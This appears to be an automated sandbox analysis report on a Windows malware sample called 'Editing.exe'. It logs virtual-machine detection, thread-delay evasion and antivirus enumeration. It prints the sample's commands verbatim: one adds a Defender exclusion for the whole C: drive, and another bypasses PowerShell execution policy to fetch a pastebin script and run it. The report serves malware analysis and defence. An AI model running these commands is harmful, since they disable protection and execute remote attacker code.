Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\ Editing.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\Desktop\ Editing.exeMemory allocated: 24437CD0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ Editing.exeWindow / User API: threadDelayed 3173Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exeWindow / User API: threadDelayed 368Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7843Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1757Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7032Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2741Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7496
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2179
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.dllJump to dropped file
Source: C:\Users\user\Desktop\ Editing.exeAPI coverage: 0.0 %
Source: C:\Users\user\Desktop\ Editing.exe TID: 884Thread sleep count: 3173 > 30Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exe TID: 884Thread sleep count: 368 > 30Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exe TID: 5724Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep count: 7843 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5088Thread sleep count: 1757 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028Thread sleep count: 7032 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep count: 2741 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1936Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488Thread sleep count: 7496 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1588Thread sleep count: 2179 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\ Editing.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Editing.exe, 00000000.00000003.2555244035.00000284CDA3B000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2984905082.00000284CDA3B000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213355561.00000284CD9D6000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.3198274498.00000284CDA3B000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2460451409.00000284CDA3B000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2727732700.00000284CDA3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2274209280.0000020A7A8FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\ Editing.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFD9A863843Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD5A5.tmp" "c:\Users\user\AppData\Local\Temp\fri53hgi\CSCED018B8952BA4EF4818E245D55BA92D6.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\ Editing.exeCode function: 0_2_00007FF646DF03BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF646DF03BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Editing.exe, 00000000.00000002.3213355561.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2460451409.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2461347543.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2554825670.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2728413319.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2727732700.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2555244035.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.3198778516.00000284CDB57000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2728554662.00000284CDB57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\ Editing.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

